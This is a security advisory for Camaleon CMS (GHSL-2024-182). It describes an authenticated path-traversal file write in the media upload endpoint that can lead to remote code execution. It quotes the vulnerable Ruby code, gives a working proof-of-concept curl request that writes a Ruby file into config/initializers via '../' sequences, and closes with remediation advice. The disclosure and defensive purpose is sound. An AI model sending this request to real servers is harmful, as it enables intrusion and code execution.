Lucene search

K
osvGoogleOSV:GHSA-WMJG-VQHV-Q5P5
HistorySep 18, 2024 - 2:39 p.m.

Camaleon CMS affected by arbitrary file write to RCE (GHSL-2024-182)

2024-09-1814:39:03
Google
osv.dev
4
arbitrary file write
remote code execution
upload method
mediacontroller
ruby on rails
file system permissions.

CVSS3

9.9

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

AI Score

8.6

Confidence

High

EPSS

0.001

Percentile

39.0%

An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application.

Once a user upload is started via the upload method, the file_upload and the folder parameter

def upload(settings = {})
  params[:dimension] = nil if params[:skip_auto_crop].present?
  f = { error: 'File not found.' }
  if params[:file_upload].present?
    f = upload_file(params[:file_upload],
                    { folder: params[:folder], dimension: params['dimension'], formats: params[:formats], versions: params[:versions],
                      thumb_size: params[:thumb_size] }.merge(settings))
  end
  [..]
end

are passed to the upload_file method. Inside that method the given settings are merged with some presets. The file format is checked against the formats settings we can override with the formats parameters.

# formats validations
  return { error: "#{ct('file_format_error')} (#{settings[:formats]})" } unless cama_uploader.class.validate_file_format(
    uploaded_io.path, settings[:formats]
 )

Our given folder is then passed unchecked to the Cama_uploader:

key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash
res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] })

In the add_file method of CamaleonCmsLocalUploader this key argument containing the unchecked path is then used to write the file to the file system:

def add_file(uploaded_io_or_file_path, key, args = {})
  [..]
  upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path
  File.open(File.join(@root_folder, key), 'wb') { |file| file.write(upload_io.read) }
  [..]
end

Proof of concept
Precondition: A valid account of a registered user is required. (The values for auth_token and _cms_session need to be replaced with authenticated values in the curl command below)

curl --path-as-is -i -s -k -X $‘POST’
-H $‘User-Agent: Mozilla/5.0’ -H $‘Content-Type: multipart/form-data; boundary=----WebKitFormBoundary80dMC9jX3srWAsga’ -H $‘Accept: /’ -H $‘Connection: keep-alive’
-b $‘auth_token=[…]; _cms_session=[…]’
–data-binary $‘------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name="file_upload"; filename="test.rb"\x0d\x0aContent-Type: text/x-ruby-script\x0d\x0a\x0d\x0aputs "================================="\x0aputs "================================="\x0aputs "= COMPROMISED ="\x0aputs "================================="\x0aputs "================================="\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name="folder"\x0d\x0a\x0d\x0a…/…/…/config/initializers/\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga\x0d\x0aContent-Disposition: form-data; name="skip_auto_crop"\x0d\x0a\x0d\x0atrue\x0d\x0a------WebKitFormBoundary80dMC9jX3srWAsga–\x0d\x0a’
$‘https://<camaleon-host>/admin/media/upload?actions=false’
Note that the upload form field formats was removed so that Camaleon CMS accepts any file. The folder was set to …/…/…/config/initializers/so that following Ruby script is written into the initializers folder of the Rails web app:

puts “=================================”
puts “=================================”
puts “= COMPROMISED =”
puts “=================================”
puts “=================================”
Once Camaleon CMS is restarted following output will be visible in the log:

=================================

= COMPROMISED =

=================================
Impact
This issue may lead up to Remote Code Execution (RCE) via arbitrary file write.

Remediation
Normalize file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as … in untrusted input that is used to build paths.

See also:

CodeQL: Uncontrolled data used in path expression
OWASP: Path Traversal

CVSS3

9.9

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

AI Score

8.6

Confidence

High

EPSS

0.001

Percentile

39.0%